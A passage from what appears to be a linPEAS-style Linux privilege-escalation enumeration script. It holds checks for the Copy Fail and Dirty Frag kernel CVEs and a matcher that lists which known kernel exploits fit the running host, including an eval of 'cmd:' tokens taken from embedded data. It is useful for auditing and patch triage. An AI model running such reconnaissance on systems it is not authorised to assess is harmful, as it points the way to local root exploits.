out("PYTHON_PROBE_UNKNOWN: %s: %s" % (type(e).__name__, e), 1) 2101 finally: 2102 try: 2103 signal.alarm(0) 2104 except Exception: 2105 pass 2106 for x in (fd,rfd,wfd): 2107 try: 2108 if x is not None: 2109 os.close(x) 2110 except Exception: 2111 pass 2112 for s in (op,master): 2113 try: 2114 if s is not None: 2115 s.close() 2116 except Exception: 2117 pass 2118 try: 2119 if td: 2120 shutil.rmtree(td) 2121 except Exception: 2122 pass 2123 PY 2124 if [ ! -s "$CF31_TMP_PY" ]; then 2125 rm -f "$CF31_TMP_PY" 2126 return 1 2127 fi 2128 if command -v timeout >/dev/null 2>&1; then 2129 timeout "$CF31_PY_TIMEOUT" "$CF31_PY" "$CF31_TMP_PY" 2130 else 2131 "$CF31_PY" "$CF31_TMP_PY" 2132 fi 2133 CF31_RC=$? 2134 rm -f "$CF31_TMP_PY" 2135 return "$CF31_RC" 2136 } 2137 checkCopyFail() { 2138 ( 2139 CF31_PY_TIMEOUT=12 2140 CF31_TMP_PY="" 2141 trap '[ -n "$CF31_TMP_PY" ] && rm -f "$CF31_TMP_PY"' EXIT HUP INT TERM 2142 CF31_KERNEL_OS=$(uname -s 2>/dev/null || echo unknown) 2143 if [ "$CF31_KERNEL_OS" != "Linux" ]; then 2144 echo "NOT APPLICABLE: Copy Fail (CVE-2026-31431) affects Linux kernels only." | sed -${E} "s,.*,${SED_GREEN}," 2145 exit 0 2146 fi 2147 for CF31_CANDIDATE in python3 python; do 2148 if command -v "$CF31_CANDIDATE" >/dev/null 2>&1 && cf31_py_can_run_probe "$CF31_CANDIDATE"; then 2149 CF31_MSG=$(cf31_run_python_probe "$CF31_CANDIDATE") 2150 CF31_RC=$? 2151 case "$CF31_RC" in 2152 0) 2153 printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_GREEN}," 2154 exit 0 2155 ;; 2156 2) 2157 printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2158 exit 2 2159 ;; 2160 1) 2161 [ -n "$CF31_MSG" ] && printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2162 ;; 2163 esac 2164 echo "Python probe inconclusive; falling back to POSIX sh triage." 2165 break 2166 fi 2167 done 2168 CF31_KERNEL_RELEASE=$(uname -r 2>/dev/null || echo unknown) 2169 CF31_KV=$(printf '%s\n' "$CF31_KERNEL_RELEASE" | sed 's/^[^0-9]*//; s/[^0-9.].*$//') 2170 CF31_KERNEL_VERSION="$CF31_KV" 2171 set -- $(printf '%s\n' "$CF31_KV" | tr '.' ' ') 2172 CF31_MAJ=$(cf31_num "${1:-0}") 2173 CF31_MIN=$(cf31_num "${2:-0}") 2174 CF31_PAT=$(cf31_num "${3:-0}") 2175 CF31_API=unknown 2176 CF31_CFG='' 2177 for CF31_CFG_FILE in /proc/config.gz /boot/config-"$CF31_KERNEL_RELEASE" /lib/modules/"$CF31_KERNEL_RELEASE"/config; do 2178 [ -r "$CF31_CFG_FILE" ] || continue 2179 case "$CF31_CFG_FILE" in 2180 *.gz) 2181 if command -v gzip >/dev/null 2>&1; then 2182 CF31_CFG_LINE=$(gzip -cd "$CF31_CFG_FILE" 2>/dev/null | grep -E '^(# )?CONFIG_CRYPTO_USER_API_AEAD(=| is not set)' | tail -n 1) 2183 else 2184 CF31_CFG_LINE='' 2185 fi 2186 ;; 2187 *) 2188 CF31_CFG_LINE=$(grep -E '^(# )?CONFIG_CRYPTO_USER_API_AEAD(=| is not set)' "$CF31_CFG_FILE" 2>/dev/null | tail -n 1) 2189 ;; 2190 esac 2191 [ -n "$CF31_CFG_LINE" ] && CF31_CFG=$CF31_CFG_LINE 2192 done 2193 case "$CF31_CFG" in 2194 *'is not set'*) CF31_API=off ;; 2195 *=y) CF31_API=builtin ;; 2196 *=m) CF31_API=module ;; 2197 esac 2198 if [ "$CF31_API" = unknown ]; then 2199 if [ -e /sys/module/algif_aead ]; then 2200 CF31_API=loaded 2201 elif command -v modinfo >/dev/null 2>&1 && modinfo algif_aead >/dev/null 2>&1; then 2202 CF31_API=module 2203 elif find /lib/modules/"$CF31_KERNEL_RELEASE" -name 'algif_aead.ko*' -print 2>/dev/null | grep -q .; then 2204 CF31_API=module 2205 elif [ -r /proc/crypto ] && grep -q 'authencesn(hmac(sha256),cbc(aes))' /proc/crypto 2>/dev/null; then 2206 CF31_API=reachable 2207 fi 2208 fi 2209 if [ "$CF31_API" = off ]; then 2210 echo "NOT VULNERABLE: CONFIG_CRYPTO_USER_API_AEAD is disabled." | sed -${E} "s,.*,${SED_GREEN}," 2211 exit 0 2212 fi 2213 CF31_BLOCKED=no 2214 for CF31_CFG_FILE in /etc/modprobe.d/*.conf /lib/modprobe.d/*.conf /usr/lib/modprobe.d/*.conf; do 2215 [ -f "$CF31_CFG_FILE" ] || continue 2216 if grep -Eq '^[[:space:]]*install[[:space:]]+algif_aead[[:space:]]+(/usr)?/bin/(false|true)([[:space:]]|$)' "$CF31_CFG_FILE" 2>/dev/null; then 2217 CF31_BLOCKED=yes 2218 fi 2219 done 2220 if [ "$CF31_API" = module ] && [ "$CF31_BLOCKED" = yes ] && [ ! -e /sys/module/algif_aead ]; then 2221 echo "NOT VULNERABLE: algif_aead autoload is blocked and the module is not loaded." | sed -${E} "s,.*,${SED_GREEN}," 2222 exit 0 2223 fi 2224 if [ -r /proc/cmdline ] && grep -q 'initcall_blacklist=algif_aead_init' /proc/cmdline 2>/dev/null; then 2225 echo "LIKELY NOT VULNERABLE: kernel booted with initcall_blacklist=algif_aead_init." | sed -${E} "s,.*,${SED_GREEN}," 2226 exit 0 2227 fi 2228 CF31_FIXED_PKG=no 2229 if command -v dpkg-query >/dev/null 2>&1; then 2230 CF31_PKG=$(dpkg-query -S "/boot/vmlinuz-$CF31_KERNEL_RELEASE" 2>/dev/null | sed 's/:.*//' | sed -n '1p') 2231 if [ -n "$CF31_PKG" ]; then 2232 for CF31_CFG_FILE in /usr/share/doc/"$CF31_PKG"/changelog*; do 2233 [ -f "$CF31_CFG_FILE" ] || continue 2234 case "$CF31_CFG_FILE" in 2235 *.gz) command -v gzip >/dev/null 2>&1 && gzip -cd "$CF31_CFG_FILE" 2>/dev/null ;; 2236 *) cat "$CF31_CFG_FILE" 2>/dev/null ;; 2237 esac 2238 done | grep -Eiq 'CVE-2026-31431|a664bf3d603d|ce42ee423e58|fafe0fa2995a|algif_aead.*out-of-place|Revert to operating out-of-place' && CF31_FIXED_PKG=yes 2239 fi 2240 fi 2241 if [ "$CF31_FIXED_PKG" = no ] && command -v rpm >/dev/null 2>&1; then 2242 CF31_PKG=$(rpm -q --whatprovides "kernel-uname-r = $CF31_KERNEL_RELEASE" 2>/dev/null | sed -n '1p') 2243 case "$CF31_PKG" in 2244 ''|no\ package*) ;; 2245 *) 2246 rpm -q --changelog "$CF31_PKG" 2>/dev/null | 2247 grep -Eiq 'CVE-2026-31431|a664bf3d603d|ce42ee423e58|fafe0fa2995a|algif_aead.*out-of-place|Revert to operating out-of-place' && CF31_FIXED_PKG=yes 2248 ;; 2249 esac 2250 fi 2251 if [ "$CF31_FIXED_PKG" = yes ]; then 2252 echo "LIKELY NOT VULNERABLE: running kernel package changelog mentions the CVE-2026-31431 fix." | sed -${E} "s,.*,${SED_GREEN}," 2253 exit 0 2254 fi 2255 if [ "$CF31_MAJ" -lt 4 ] || { [ "$CF31_MAJ" -eq 4 ] && [ "$CF31_MIN" -lt 14 ]; }; then 2256 echo "NOT VULNERABLE for upstream kernel version: $CF31_KERNEL_RELEASE predates the vulnerable upstream commit." | sed -${E} "s,.*,${SED_GREEN}," 2257 exit 0 2258 fi 2259 if cf31_is_fixed_upstream_release; then 2260 echo "LIKELY NOT VULNERABLE for upstream kernel version: $CF31_KERNEL_RELEASE is at/after a fixed upstream release." | sed -${E} "s,.*,${SED_GREEN}," 2261 exit 0 2262 fi 2263 if [ "$CF31_API" = unknown ]; then 2264 echo "UNKNOWN: $CF31_KERNEL_RELEASE is in the affected upstream range, but AEAD user API exposure could not be verified." | sed -${E} "s,.*,${SED_RED_YELLOW}," 2265 exit 1 2266 fi 2267 echo "LIKELY VULNERABLE: $CF31_KERNEL_RELEASE is in the affected upstream range and AEAD user API appears $CF31_API." | sed -${E} "s,.*,${SED_RED_YELLOW}," 2268 exit 2 2269 ) 2270 } 2271 2272 echo_not_found(){ 2273 printf $DG"$1 Not Found\n"$NC 2274 } 2275 2276 KERNEL_CVE_EXPL="" 2277 KERNEL_CVE_ALT="" 2278 KERNEL_CVE_MIL="" 2279 kercve_norm_ver() { 2280 printf "%s" "$1" | tr '-' '.' | sed 's/[^0-9.].*$//' | sed 's/\.\./\./g' | sed 's/^\.//' | sed 's/\.$//' 2281 } 2282 kercve_ver_cmp() { 2283 KERNEL_CVE_CURVER=$(kercve_norm_ver "$1") 2284 KERNEL_CVE_REQVER=$(kercve_norm_ver "$3") 2285 KERNEL_CVE_OP="$2" 2286 [ -z "$KERNEL_CVE_CURVER" ] && return 1 2287 [ -z "$KERNEL_CVE_REQVER" ] && return 1 2288 KERNEL_CVE_CMP=$(awk -v a="$KERNEL_CVE_CURVER" -v b="$KERNEL_CVE_REQVER" ' 2289 function clean(v){gsub(/[^0-9]/,"",v); if(v=="")v=0; return v+0} 2290 BEGIN{ 2291 na=split(a,A,"."); nb=split(b,B,"."); n=(na>nb?na:nb); 2292 for(i=1;i<=n;i++){ 2293 va=(i<=na?clean(A[i]):0); vb=(i<=nb?clean(B[i]):0); 2294 if(va<vb){print -1; exit} 2295 if(va>vb){print 1; exit} 2296 } 2297 print 0 2298 }') 2299 case "$KERNEL_CVE_OP" in 2300 '=') [ "$KERNEL_CVE_CMP" -eq 0 ] ;; 2301 '>') [ "$KERNEL_CVE_CMP" -gt 0 ] ;; 2302 '<') [ "$KERNEL_CVE_CMP" -lt 0 ] ;; 2303 '>=') [ "$KERNEL_CVE_CMP" -ge 0 ] ;; 2304 '<=') [ "$KERNEL_CVE_CMP" -le 0 ] ;; 2305 *) return 1 ;; 2306 esac 2307 } 2308 kercve_get_cfg_line() { 2309 KERNEL_CVE_CFG_KEY="$1" 2310 if [ -z "$KERNEL_CVE_CFG_SOURCE" ] || ! [ -r "$KERNEL_CVE_CFG_SOURCE" ]; then 2311 return 1 2312 fi 2313 if printf "%s" "$KERNEL_CVE_CFG_SOURCE" | grep -q '\\.gz$'; then 2314 KERNEL_CVE_CFG_LINE=$(gzip -dc "$KERNEL_CVE_CFG_SOURCE" 2>/dev/null | grep -E "^(${KERNEL_CVE_CFG_KEY}=|# ${KERNEL_CVE_CFG_KEY} is not set)" | head -n1) 2315 else 2316 KERNEL_CVE_CFG_LINE=$(grep -E "^(${KERNEL_CVE_CFG_KEY}=|# ${KERNEL_CVE_CFG_KEY} is not set)" "$KERNEL_CVE_CFG_SOURCE" 2>/dev/null | head -n1) 2317 fi 2318 [ -n "$KERNEL_CVE_CFG_LINE" ] 2319 } 2320 kercve_eval_config_req() { 2321 KERNEL_CVE_CFG_EXPR="$1" 2322 [ -z "$KERNEL_CVE_CFG_SOURCE" ] && return 0 2323 if printf "%s" "$KERNEL_CVE_CFG_EXPR" | grep -q '!='; then 2324 KERNEL_CVE_CFG_OP='!=' 2325 KERNEL_CVE_CFG_KEY=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'!=' '{print $1}') 2326 KERNEL_CVE_CFG_EXPECT=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'!=' '{print $2}') 2327 elif printf "%s" "$KERNEL_CVE_CFG_EXPR" | grep -q '='; then 2328 KERNEL_CVE_CFG_OP='=' 2329 KERNEL_CVE_CFG_KEY=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'=' '{print $1}') 2330 KERNEL_CVE_CFG_EXPECT=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'=' '{print $2}') 2331 else 2332 KERNEL_CVE_CFG_OP='present' 2333 KERNEL_CVE_CFG_KEY="$KERNEL_CVE_CFG_EXPR" 2334 KERNEL_CVE_CFG_EXPECT='[my]' 2335 fi 2336 if ! kercve_get_cfg_line "$KERNEL_CVE_CFG_KEY"; then 2337 return 0 2338 fi 2339 if printf "%s" "$KERNEL_CVE_CFG_LINE" | grep -q '# .* is not set'; then 2340 KERNEL_CVE_CFG_CUR='n' 2341 else 2342 KERNEL_CVE_CFG_CUR=$(printf "%s" "$KERNEL_CVE_CFG_LINE" | awk -F'=' '{print $2}') 2343 fi 2344 if [ "$KERNEL_CVE_CFG_OP" = '!=' ]; then 2345 if printf "%s" "$KERNEL_CVE_CFG_EXPECT" | grep -q '\\[my\\]'; then 2346 ! printf "%s" "$KERNEL_CVE_CFG_CUR" | grep -Eq '^[my]$' 2347 else 2348 [ "$KERNEL_CVE_CFG_CUR" != "$KERNEL_CVE_CFG_EXPECT" ] 2349 fi 2350 return 2351 fi 2352 if printf "%s" "$KERNEL_CVE_CFG_EXPECT" | grep -q '\\[my\\]'; then 2353 printf "%s" "$KERNEL_CVE_CFG_CUR" | grep -Eq '^[my]$' 2354 return 2355 fi 2356 [ "$KERNEL_CVE_CFG_CUR" = "$KERNEL_CVE_CFG_EXPECT" ] 2357 } 2358 kercve_eval_sysctl_req() { 2359 KERNEL_CVE_SYS_EXPR="$1" 2360 if printf "%s" "$KERNEL_CVE_SYS_EXPR" | grep -q '!='; then 2361 KERNEL_CVE_SYS_OP='!=' 2362 KERNEL_CVE_SYS_KEY=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'!=' '{print $1}') 2363 KERNEL_CVE_SYS_VAL=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'!=' '{print $2}') 2364 elif printf "%s" "$KERNEL_CVE_SYS_EXPR" | grep -q '=='; then 2365 KERNEL_CVE_SYS_OP='==' 2366 KERNEL_CVE_SYS_KEY=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'==' '{print $1}') 2367 KERNEL_CVE_SYS_VAL=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'==' '{print $2}') 2368 else 2369 return 1 2370 fi 2371 KERNEL_CVE_SYS_CUR=$(sysctl -n "$KERNEL_CVE_SYS_KEY" 2>/dev/null) 2372 [ -z "$KERNEL_CVE_SYS_CUR" ] && return 0 2373 if [ "$KERNEL_CVE_SYS_OP" = '==' ]; then 2374 [ "$KERNEL_CVE_SYS_CUR" = "$KERNEL_CVE_SYS_VAL" ] 2375 else 2376 [ "$KERNEL_CVE_SYS_CUR" != "$KERNEL_CVE_SYS_VAL" ] 2377 fi 2378 } 2379 kercve_eval_req_token() { 2380 KERNEL_CVE_REQ="$1" 2381 [ -z "$KERNEL_CVE_REQ" ] && return 0 2382 if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^pkg='; then 2383 [ "$KERNEL_CVE_REQ" = 'pkg=linux-kernel' ] 2384 return 2385 fi 2386 if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^ver'; then 2387 KERNEL_CVE_OP=$(printf "%s" "$KERNEL_CVE_REQ" | sed -E 's/^ver(<=|>=|=|<|>).*/\1/') 2388 KERNEL_CVE_VER=$(printf "%s" "$KERNEL_CVE_REQ" | sed -E 's/^ver(<=|>=|=|<|>)//') 2389 kercve_ver_cmp "$KERNEL_CVE_KERNEL_VERSION" "$KERNEL_CVE_OP" "$KERNEL_CVE_VER" 2390 return 2391 fi 2392 if [ "$KERNEL_CVE_REQ" = 'x86_64' ]; then 2393 [ "$KERNEL_CVE_KERNEL_ARCH" = 'x86_64' ] 2394 return 2395 fi 2396 if [ "$KERNEL_CVE_REQ" = 'x86' ]; then 2397 [ "$KERNEL_CVE_KERNEL_ARCH" = 'i386' ] || [ "$KERNEL_CVE_KERNEL_ARCH" = 'i686' ] || [ "$KERNEL_CVE_KERNEL_ARCH" = 'x86' ] 2398 return 2399 fi 2400 if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^CONFIG_'; then 2401 kercve_eval_config_req "$KERNEL_CVE_REQ" 2402 return 2403 fi 2404 if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^sysctl:'; then 2405 kercve_eval_sysctl_req "${KERNEL_CVE_REQ#sysctl:}" 2406 return 2407 fi 2408 if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^cmd:'; then 2409 eval "${KERNEL_CVE_REQ#cmd:}" >/dev/null 2>&1 2410 return 2411 fi 2412 return 1 2413 } 2414 kercve_match_version_list() { 2415 KERNEL_CVE_VERS="$1" 2416 KERNEL_CVE_VER_LINES=$(printf "%s" "$KERNEL_CVE_VERS" | tr ',' '\n') 2417 while IFS= read -r KERNEL_CVE_VER; do 2418 KERNEL_CVE_VER=$(printf "%s" "$KERNEL_CVE_VER" | sed 's/^ *//;s/ *$//') 2419 [ -z "$KERNEL_CVE_VER" ] && continue 2420 if printf "%s" "$KERNEL_CVE_KERNEL_VERSION" | grep -Eq "^${KERNEL_CVE_VER}(\\.|-|$)"; then 2421 return 0 2422 fi 2423 done <<EOFV 2424 $KERNEL_CVE_VER_LINES 2425 EOFV 2426 return 1 2427 } 2428 kercve_normalize_cve_list() { 2429 KERNEL_CVE_ID_RAW="$1" 2430 KERNEL_CVE_ID_OUT="" 2431 KERNEL_CVE_ID_RAW=$(printf "%s" "$KERNEL_CVE_ID_RAW" | tr ';' ',' | tr '|' ',') 2432 while IFS= read -r KERNEL_CVE_ID_ITEM; do 2433 KERNEL_CVE_ID_ITEM=$(printf "%s" "$KERNEL_CVE_ID_ITEM" | sed 's/^ *//;s/ *$//' | tr '[:lower:]' '[:upper:]') 2434 [ -z "$KERNEL_CVE_ID_ITEM" ] && continue 2435 if printf "%s" "$KERNEL_CVE_ID_ITEM" | grep -Eq '^CVE-[0-9]{4}-[0-9]+$'; then 2436 if [ -z "$KERNEL_CVE_ID_OUT" ]; then KERNEL_CVE_ID_OUT="$KERNEL_CVE_ID_ITEM"; else KERNEL_CVE_ID_OUT="$KERNEL_CVE_ID_OUT,$KERNEL_CVE_ID_ITEM"; fi 2437 continue 2438 fi 2439 if printf "%s" "$KERNEL_CVE_ID_ITEM" | grep -Eq '^[0-9]{4}-[0-9]+$'; then 2440 if [ -z "$KERNEL_CVE_ID_OUT" ]; then KERNEL_CVE_ID_OUT="CVE-$KERNEL_CVE_ID_ITEM"; else KERNEL_CVE_ID_OUT="$KERNEL_CVE_ID_OUT,CVE-$KERNEL_CVE_ID_ITEM"; fi 2441 continue 2442 fi 2443 done <<EOFC 2444 $(printf "%s" "$KERNEL_CVE_ID_RAW" | tr ',' '\n') 2445 EOFC 2446 printf "%s" "$KERNEL_CVE_ID_OUT" 2447 } 2448 kercve_print_match() { 2449 KERNEL_CVE_PRINT_ID="$1" 2450 KERNEL_CVE_NAME="$2" 2451 KERNEL_CVE_REQS="$3" 2452 KERNEL_CVE_TAGS="$4" 2453 KERNEL_CVE_RANK="$5" 2454 KERNEL_CVE_COMMENTS="$6" 2455 KERNEL_CVE_PRINT_LINE="" 2456 [ -n "$KERNEL_CVE_PRINT_ID" ] && KERNEL_CVE_PRINT_LINE="CVE: $KERNEL_CVE_PRINT_ID" 2457 [ -n "$KERNEL_CVE_NAME" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Name: $KERNEL_CVE_NAME" 2458 [ -n "$KERNEL_CVE_REQS" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Match data: $KERNEL_CVE_REQS" 2459 [ -n "$KERNEL_CVE_TAGS" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Tags: $KERNEL_CVE_TAGS" 2460 [ -n "$KERNEL_CVE_RANK" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Rank: $KERNEL_CVE_RANK" 2461 [ -n "$KERNEL_CVE_COMMENTS" ] && KERNEL_CVE_PRINT_LINE="${KERNEL_CVE_PRINT_LINE}${KERNEL_CVE_PRINT_LINE:+ | }Details: $KERNEL_CVE_COMMENTS" 2462 [ -z "$KERNEL_CVE_PRINT_LINE" ] && KERNEL_CVE_PRINT_LINE="Kernel vuln matched with no printable metadata" 2463 printf "%s\n" "$KERNEL_CVE_PRINT_LINE" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2464 } 2465 kercve_run_registry() { 2466 KERNEL_CVE_KERNEL_OS=$(uname -s 2>/dev/null) 2467 KERNEL_CVE_KERNEL_RELEASE=$(uname -r 2>/dev/null) 2468 KERNEL_CVE_KERNEL_VERSION=$(kercve_norm_ver "$KERNEL_CVE_KERNEL_RELEASE") 2469 KERNEL_CVE_KERNEL_ARCH=$(uname -m 2>/dev/null) 2470 KERNEL_CVE_CFG_SOURCE="" 2471 for KERNEL_CVE_CFG_FILE in "/proc/config.gz" "/boot/config-$KERNEL_CVE_KERNEL_RELEASE" "/lib/modules/$KERNEL_CVE_KERNEL_RELEASE/build/.config" "/usr/lib/modules/$KERNEL_CVE_KERNEL_RELEASE/build/.config" "/usr/src/linux/.config"; do 2472 if [ -r "$KERNEL_CVE_CFG_FILE" ]; then 2473 KERNEL_CVE_CFG_SOURCE="$KERNEL_CVE_CFG_FILE" 2474 break 2475 fi 2476 done 2477 KERNEL_CVE_ALL_DATA=$(printf "%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s" \ 2478 "$KERNEL_CVE_DATA_1" "$KERNEL_CVE_DATA_2" "$KERNEL_CVE_DATA_3" "$KERNEL_CVE_DATA_4" "$KERNEL_CVE_DATA_5" \ 2479 "$KERNEL_CVE_DATA_6" "$KERNEL_CVE_DATA_7" "$KERNEL_CVE_DATA_8" "$KERNEL_CVE_DATA_9" "$KERNEL_CVE_DATA_10" \ 2480 "$KERNEL_CVE_DATA_11" "$KERNEL_CVE_DATA_12" "$KERNEL_CVE_DATA_13" "$KERNEL_CVE_DATA_14" "$KERNEL_CVE_DATA_15" \ 2481 "$KERNEL_CVE_DATA_16" "$KERNEL_CVE_DATA_17" "$KERNEL_CVE_DATA_18" "$KERNEL_CVE_DATA_19" "$KERNEL_CVE_DATA_20" \ 2482 "$KERNEL_CVE_DATA_21" "$KERNEL_CVE_DATA_22" "$KERNEL_CVE_DATA_23") 2483 print_list "Operating system ............. $KERNEL_CVE_KERNEL_OS\n" 2484 print_list "Kernel release ............... $KERNEL_CVE_KERNEL_RELEASE\n" 2485 print_list "Comparable version ........... $KERNEL_CVE_KERNEL_VERSION\n" 2486 print_list "Data chunk limit ............. max 25 rows per KERNEL_CVE_DATA_* variable (1..23)\n" 2487 if [ -n "$KERNEL_CVE_CFG_SOURCE" ]; then 2488 print_list "Kernel config source ......... $KERNEL_CVE_CFG_SOURCE\n" 2489 else 2490 print_list "Kernel config source ......... " 2491 echo_not_found "not available" 2492 fi 2493 if [ "$KERNEL_CVE_KERNEL_OS" != "Linux" ]; then 2494 print_list "Registry status .............. Linux kernel CVE datasets are not applicable to $KERNEL_CVE_KERNEL_OS\n" | sed -${E} "s,.*,${SED_GREEN}," 2495 return 0 2496 fi 2497 KERNEL_CVE_MATCHES=0 2498 while IFS=" " read -r KERNEL_CVE_ID KERNEL_CVE_NAME KERNEL_CVE_REQS KERNEL_CVE_TAGS KERNEL_CVE_RANK KERNEL_CVE_COMMENTS; do 2499 [ -z "$KERNEL_CVE_ID" ] && continue 2500 KERNEL_CVE_TOKEN_OK=1 2501 if printf "%s" "$KERNEL_CVE_REQS" | grep -Eq '^pkg=|^ver|CONFIG_|sysctl:|cmd:|,pkg=|,ver|,CONFIG_|,sysctl:|,cmd:'; then 2502 KERNEL_CVE_REQ_LINES=$(printf "%s" "$KERNEL_CVE_REQS" | tr ',' '\n') 2503 while IFS= read -r KERNEL_CVE_REQ; do 2504 KERNEL_CVE_REQ=$(printf "%s" "$KERNEL_CVE_REQ" | sed 's/^ *//;s/ *$//') 2505 if ! kercve_eval_req_token "$KERNEL_CVE_REQ"; then 2506 KERNEL_CVE_TOKEN_OK=0 2507 break 2508 fi 2509 done <<EOFR 2510 $KERNEL_CVE_REQ_LINES 2511 EOFR 2512 else 2513 if ! kercve_match_version_list "$KERNEL_CVE_REQS"; then 2514 KERNEL_CVE_TOKEN_OK=0 2515 fi 2516 fi 2517 [ "$KERNEL_CVE_TOKEN_OK" -eq 0 ] && continue 2518 # Some embedded datasets store rows as: <exploit_name> <cve_id> <versions> ... 2519 # while others store: <cve_id> <exploit_name> <reqs> ... 2520 # Normalize whichever column contains the CVE identifier, but keep printing 2521 # all matched vulns even when no CVE exists for that row. 2522 KERNEL_CVE_ID_RAW="$KERNEL_CVE_ID" 2523 KERNEL_CVE_ID_NORM=$(kercve_normalize_cve_list "$KERNEL_CVE_ID_RAW") 2524 if [ -z "$KERNEL_CVE_ID_NORM" ]; then 2525 KERNEL_CVE_ID_NORM=$(kercve_normalize_cve_list "$KERNEL_CVE_NAME") 2526 if [ -n "$KERNEL_CVE_ID_NORM" ]; then 2527 KERNEL_CVE_NAME="$KERNEL_CVE_ID_RAW" 2528 fi 2529 fi 2530 if [ "$KERNEL_CVE_NAME" = "N/A" ] || [ "$KERNEL_CVE_NAME" = "n/a" ] || [ "$KERNEL_CVE_NAME" = "N\\A" ]; then 2531 KERNEL_CVE_NAME="" 2532 fi 2533 if [ "$KERNEL_CVE_ID_RAW" = "N/A" ] || [ "$KERNEL_CVE_ID_RAW" = "n/a" ] || [ "$KERNEL_CVE_ID_RAW" = "N\\A" ]; then 2534 KERNEL_CVE_ID_RAW="" 2535 fi 2536 KERNEL_CVE_PRINT_ID="$KERNEL_CVE_ID_NORM" 2537 if [ -z "$KERNEL_CVE_PRINT_ID" ] && printf "%s" "$KERNEL_CVE_ID_RAW" | grep -Eq '^CVE-|^[0-9]{4}-[0-9]+$'; then 2538 KERNEL_CVE_PRINT_ID=$(kercve_normalize_cve_list "$KERNEL_CVE_ID_RAW") 2539 fi 2540 KERNEL_CVE_MATCHES=$((KERNEL_CVE_MATCHES + 1)) 2541 kercve_print_match "$KERNEL_CVE_PRINT_ID" "$KERNEL_CVE_NAME" "$KERNEL_CVE_REQS" "$KERNEL_CVE_TAGS" "$KERNEL_CVE_RANK" "$KERNEL_CVE_COMMENTS" 2542 done <<EOFD 2543 $KERNEL_CVE_ALL_DATA 2544 EOFD 2545 KERNEL_CVE_PRINT_REASON="Kernel vulns found: $KERNEL_CVE_MATCHES" 2546 if [ "$KERNEL_CVE_MATCHES" -gt 0 ]; then 2547 print_list "$KERNEL_CVE_PRINT_REASON\n" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2548 else 2549 print_list "No rule matched current kernel/version prerequisites in embedded datasets.\n" | sed -${E} "s,.*,${SED_GREEN}," 2550 fi 2551 } 2552 2553 # Contributor: Arjay Saguisa 2554 df43_norm_ver() { 2555 printf "%s" "$1" | tr '-' '.' | sed 's/[^0-9.].*$//' | sed 's/\.\./\./g' | sed 's/^\.//' | sed 's/\.$//' 2556 } 2557 df43_ver_cmp() { 2558 DF43_CURVER=$(df43_norm_ver "$1") 2559 DF43_REQVER=$(df43_norm_ver "$3") 2560 DF43_OP="$2" 2561 [ -z "$DF43_CURVER" ] && return 1 2562 [ -z "$DF43_REQVER" ] && return 1 2563 DF43_CMP=$(awk -v a="$DF43_CURVER" -v b="$DF43_REQVER" ' 2564 function clean(v){gsub(/[^0-9]/,"",v); if(v=="")v=0; return v+0} 2565 BEGIN{ 2566 na=split(a,A,"."); nb=split(b,B,"."); n=(na>nb?na:nb); 2567 for(i=1;i<=n;i++){ 2568 va=(i<=na?clean(A[i]):0); vb=(i<=nb?clean(B[i]):0); 2569 if(va<vb){print -1; exit} 2570 if(va>vb){print 1; exit} 2571 } 2572 print 0 2573 }') 2574 case "$DF43_OP" in 2575 '>=') [ "$DF43_CMP" -ge 0 ] ;; 2576 '<') [ "$DF43_CMP" -lt 0 ] ;; 2577 *) return 1 ;; 2578 esac 2579 } 2580 df43_ver_range() { 2581 df43_ver_cmp "$1" '>=' "$2" && df43_ver_cmp "$1" '<' "$3" 2582 } 2583 checkDirtyFrag() { 2584 ( 2585 DF43_KERNEL_OS=$(uname -s 2>/dev/null || echo unknown) 2586 if [ "$DF43_KERNEL_OS" != "Linux" ]; then 2587 echo "NOT APPLICABLE: Dirty Frag (CVE-2026-43284 / CVE-2026-43500) affects Linux kernels only." | sed -${E} "s,.*,${SED_GREEN}," 2588 exit 0 2589 fi 2590 DF43_KERNEL_RELEASE=$(uname -r 2>/dev/null || echo unknown) 2591 DF43_KERNEL_VERSION=$(df43_norm_ver "$DF43_KERNEL_RELEASE") 2592 DF43_KBUILD=$(uname -v 2>/dev/null || echo unknown) 2593 DF43_VERSION_KNOWN="" 2594 [ -n "$DF43_KERNEL_VERSION" ] && DF43_VERSION_KNOWN="yes" 2595 DF43_ESP_AFFECTED="yes" 2596 DF43_RXRPC_AFFECTED="yes" 2597 if [ "$DF43_VERSION_KNOWN" = "yes" ]; then 2598 DF43_ESP_AFFECTED="" 2599 if df43_ver_range "$DF43_KERNEL_VERSION" 4.11 5.10.255 \ 2600 || df43_ver_range "$DF43_KERNEL_VERSION" 5.12 5.15.205 \ 2601 || df43_ver_range "$DF43_KERNEL_VERSION" 5.16 6.1.171 \ 2602 || df43_ver_range "$DF43_KERNEL_VERSION" 6.2 6.6.138 \ 2603 || df43_ver_range "$DF43_KERNEL_VERSION" 6.7 6.12.87 \ 2604 || 